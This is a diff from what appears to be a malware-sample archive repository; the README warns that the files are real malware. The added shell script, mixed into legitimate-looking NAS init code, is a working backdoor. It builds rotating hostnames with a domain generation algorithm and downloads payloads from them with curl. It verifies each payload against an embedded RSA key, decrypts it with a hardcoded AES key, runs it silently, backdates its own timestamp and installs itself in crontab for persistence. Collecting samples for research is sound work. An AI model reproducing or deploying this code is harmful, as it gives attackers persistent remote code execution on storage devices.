+            /bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
+        fi
+
+        # wait connect
+        sleep 5
+        CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
+        if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
+            SLEEP_TIME=$(( 30 * $COUNTER ))
+            if [ $SLEEP_TIME -gt 300 ]; then
+                SLEEP_TIME=300
+            fi
+            # wait next retry
+            sleep $SLEEP_TIME
+        fi
+        COUNTER=$(( $COUNTER * 2 ))
+    done
+
+    END_TIME=$(date +"%T")
+    echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
+    # call for a new process group and for later kill
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
+    /bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
+
+    # set cloudinstall report status
+    /sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
+    # add link to report offline
+    /bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
+
+    # buzzer
+    HARDWARE_TYPE=$(uname -m)
+    if [[ "$HARDWARE_TYPE" == *"x86"* ]];
+    then
+      /sbin/hal_app --se_buzzer enc_id=0,mode=101
+    elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
+    then
+      /sbin/pic_raw 81
+    fi
+    ;;
+
+  stop)
+    # disconnect cloudinstall agent
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
+    $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
+    for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
+    do
+        # use bash kill instead /bin/kill for kill process group
+        # cloudinstall agent daemon and inotifywait
+        kill -9 -- -$i &>/dev/null
+    done
+
+    # umount
+    if [ "$NAS_ARCH" == "ARM_64" ]; then
+        /bin/umount -l $USED_LOOP_DEVICE
+        /usr/local/sbin/losetup -d $USED_LOOP_DEVICE
+    else
+        /bin/umount -l $CLOUD_INSTALL_PATH
+    fi
+    # remove all files
+    if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $NAS_CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_PATH
+    fi
+    if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
+        /bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
+    fi
+    ;;
+
+  restart)
+    $0 stop
+    $0 start
+    ;;
+
+  *)
+    echo "Usage: $0 {start|stop|restart}"
+    exit 1
+esac
+exit 0
+
+
+set_env()
+{
+	debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
+	if [ "$debug" != "NULL" ]; then
+		/bin/touch $LOG_FILE
+	else
+		/bin/rm -f $LOG_FILE
+	fi
+}
+
+set_env
+
+dbg()
+{
+	if [ -f "$LOG_FILE" ]; then
+		echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
+	fi
+}
+
+dbg "> $0 $@ (pid $$)"
+
+fi
+
+export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
+
+command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
+
+test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
+
+bdir=
+test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
+test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
+test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
+test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
+grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
+
+EOF
+test "$fgrep" || fgrep=grep
+test "$RANDOM" || RANDOM=17653
+genrstr () 
+{ 
+    local s=;
+    local min=${1:-4};
+    local max=${2:-12};
+    local kspace="${3:-a-zA-Z}"
+    tr -dc "$kspace" < /dev/urandom | { 
+        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
+        echo "$s"
+    }
+}
+
+verifyfile() {
+local file="$1"
+local sig="${2:-$file_s}"
+local out
+test ! -z "$file" && test -s "$file" || return 1
+test ! -z "$sig" && test -s "$sig" || return 1
+test -f ".rsakey" || echo "$verifykey" > ".rsakey"
+out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
+return 1
+}
+
+decryptfile() {
+local file="$1"
+local ofile="${2:-${file}}"
+local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
+openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
+test -f "$ofile" && rm -f "$ofile"
+mv "${file}_d" "$ofile" && return 0
+return 1
+}
+
+verifykey='-----BEGIN PUBLIC KEY-----
+MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
+CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
+verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
+RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
+Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
+gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
+2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
+0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
+pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
+DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
+-----END PUBLIC KEY-----'
+
+DOMAIN_EXT_A='cf tk ml ga gq'
+DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
+
+test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
+test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
+cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
+
+echo "$verifykey" > ".rsakey"
+i=0 n=0 c=0 errorcount=0
+outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
+
+for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
+        for ext in $domainexts; do
+                hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
+                hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
+                hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
+                hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
+                for host in $hostnames; do
+                        test -f "$outfile" && rm -f "$outfile"
+                        recentupdate=''
+                        curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
+                        test -s "$outfile" || continue
+                        fsize=$(( $(wc -c < "$outfile") ))
+                        test "$fsize" -gt 4096 && rm -f "$outfile" && continue
+                        rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
+                        test "$rsamsg" || continue
+                        path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
+                        hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
+                        test "$rsadomain" = "${host}.${ext}" || continue
+                        timenow=$(date +%s)
+                        test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
+                        curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
+                        filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
+                        test "$filehash" = "$hash" || continue
+                        curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
+                        verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
+                        mv "${outfile}_s" "${ts}_v"
+                        chmod 755 "$outfile" || continue
+                        ( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
+                        test "$recentupdate" -eq 1 && exit 0
+                done
+        done
+done
+
+
+if [ "$fromrcS" = 'TRUE' ]; then
+# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
+set_default_disable_status()
+{
+	QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
+	OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
+	if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
+		return
+	fi
+
+	if [ "$QPKG_ENABLE" = "NULL" ]; then
+		if [ "$OLD_ENABLE" = "FALSE" ]; then
+			dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+			/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
+		fi
+	fi
+}
+
+if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
+	export QNAP_QPKG=rtrr
+else
+	export QNAP_QPKG=HybridBackup
+	/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
+fi
+start()
+{
+	if [ -f /usr/bin/qsyncman ]; then
+		[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
+		/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
+		/usr/bin/crontab /etc/config/crontab
+		echo -n "Starting QSync manitor: "
+		[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
+		[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
+		[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
+		[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
+		[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
+		[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
+		[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
+		[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
+		/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
+		echo "OK"
+	fi
+}
+
+stop()
+{
+	echo "Shutting down QSync monitor: OK"
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        kill $pidnum 2>/dev/null
+        i=0
+        while [ ${i} -lt 5 ]
+        do
+                pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+                if [ -z "$pidnum" ]; then
+                        break
+                fi
+                sleep 1
+                i=`/usr/bin/expr ${i} + 1`
+        done
+        pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
+        [ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
+	/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
+	/usr/bin/killall -q qsyncman
+}
+
+start_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x1 ] || return -1
+	_qsyncd_run_pid=`/bin/pidof qsyncd`
+	[ -z $_qsyncd_run_pid ] || return -114
+	_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
+	_with_syslog=$1
+	if [ "x$_recycle_en" = xTRUE  ]; then
+		if [ "x$_with_syslog" = x1  ]; then
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	else
+		if [ "x$_with_syslog" = x1  ]; then
+			/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
+		else
+			/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
+		fi
+	fi
+	_iret=$?
+	if [ "x$_iret" = x0 ]; then
+		i=0
+		while [ ${i} -lt 10000 ]
+		do
+			echo "${i} millisecond..."
+			_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+			_qsyncd_run_pid=`/bin/pidof qsyncd`
+			if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
+				break
+			fi
+			usleep 50000
+			i=`/usr/bin/expr ${i} + 50`
+		done
+	fi
+	return -$_iret
+}
+
+stop_qsyncd()
+{
+	#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
+	#[ "x$_qsyncd_en" = x0 ] || return -1
+	_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
+	[ $_qsyncd_pid -lt 0 ] && return -3
+	# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
+	/bin/kill -SIGUSR1 $_qsyncd_pid
+	usleep 200000
+	# Send SIGINT to stop the QSyncd process
+	/bin/kill -SIGINT $_qsyncd_pid
+	_kill_ret=$?
+	if [ "x$_kill_ret" != x0 ]; then
+		return -3
+	fi
+	echo "need wait $1 millisecond"
+	i=0
+	while true
+	do
+		echo "${i} millisecond..."
+		_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
+		_qsyncd_run_pid=`/bin/pidof qsyncd`
+		if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
+			break
+		fi
+		if [ ${i} -ge $1 ]; then
+			# if time-out, we send two additional SIGINT to force the daemon to stop.
+			if [ $_qsyncd_pid -ge 0 ]; then
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+				usleep 200000
+				/bin/kill -SIGUSR1 $_qsyncd_pid
+			fi
+			j=0
+			while [ ${j} -lt 500 ]
+			do
+				_qsyncd_run_pid=`/bin/pidof qsyncd`
+				if [ -z $_qsyncd_run_pid ]; then
+					return 0
+				fi
+				usleep 20000
+				j=`/usr/bin/expr ${j} + 20`
+			done
+			return -62
+		fi
+		usleep 50000
+		i=`/usr/bin/expr ${i} + 50`
+	done
+	return 0
+}
+
+
+install()
+{
+	lock_file="/var/lock/qbox_install_bin.lck"
+
+	if [ ! -f "${INSTALL_BUILD_IN}" ]; then
+		dbg "build-in ${QSYNC_NAME} is installed"
+		return 1
+	fi
+
+	if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
+		dbg "${QSYNC_NAME}.bin} not found"
+		return 1
+	fi
+
+	if [ ! -x "${QPKG_CLI}" ]; then
+		dbg "${QPKG_CLI} not found"
+		return 1
+	fi
+
+	## make sure volume is exist
+	if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
+		dbg "/share/Public not found"
+		return 1
+	fi
+
+	## is removed 
+	if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
+		/bin/rm -f ${INSTALL_BUILD_IN}
+		dbg "${QSYNC_NAME} is removed"
+		return 1
+	fi
+
+	if [ -f "$lock_file" ]; then 
+		if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
+			echo "${QSYNC_NAME} is installing"
+			dbg "${QSYNC_NAME} is installing"
+			return 1
+		fi
+	fi
+
+	/bin/touch "$lock_file"	
+	/bin/rm -f ${INSTALL_BUILD_IN}
+	dbg "install build-in ${QSYNC_NAME} start"
+
+	set_default_disable_status
+
+	## install build in Qsync
+	${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
+	sleep 20
+
+	wait_install=60
+	## avoid initial take long time or fail
+        while [ "$wait_install" -gt 0 ]; do
+		stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
+                if [ "$stcode" = "0" ]; then
+                        break
+                fi
+                sleep 1
+                let "wait_install--"
+        done
+
+	${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
+	/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
+	/bin/rm -f "$lock_file"	
+	dbg "install build-in ${QSYNC_NAME} success"
+}
+
+if [ "$1" == "stop" ]; then
+	exit 0
+fi
+fi
+XEOF
+chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
+touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
+( ( exec >/dev/null 2>&1 </dev/null; "${bdir}/.qpkg/.liveupdate/liveupdate.sh" </dev/null >/dev/null 2>/dev/null & ) & )
+fi
+
+test -x "${bdir}/.qpkg/.liveupdate/liveupdate.sh" || chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
+
+crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
+trycount=10; trycount=$(( $trycount - 10 ))
+set x $crontabargs; shift
+while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
+trycount=$(( $trycount + 1 ))
+getopts ':c:' OPT 2>/dev/null
+test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
+test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
+done
+test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
+
+for crontab in "$crontabfile" "${confdir}/crontab"; do
+if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
+:
+else
+cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
+cronhour=$(printf '%i' "$(( $RANDOM % 24 ))")
+cronhour=$(printf '%i,' "$(( ( $cronhour + 8 ) % 24 ))" "$(( ( $cronhour + 16 ) % 24 ))")"$cronhour"
+echo "$cronmins $cronhour"' * * * '"${bdir}/.qpkg/.liveupdate/liveupdate.sh >/dev/null 2>/dev/null" >> "$crontab"
+crontab "$crontab"
+sleep 2
+fi
+done
+) & ) &

README.md

@@ -4,7 +4,7 @@ ATTENTION: This repository contains actual malware, do not execute any of these
 
 They have been renamed for easier processing.
 
-This is an ongoing and updated archive of files that we collect which are associated with specific public reports. If there is a report that is released which we haven't yet covered with related IOCs please feel free to put in a request!
+This is an ongoing and updated archive of files that we collect which are associated with specific public malicious threat reports. If there is a report that is released which we haven't yet covered with related IOCs please feel free to put in a request!
 
 All of the malware samples contained in this repository has been collected by various locations.  This repository is designed to try to stay up to date with various public reports and to make the process of retreiving the files associated with this reports (tied to the published IOCs) more easily.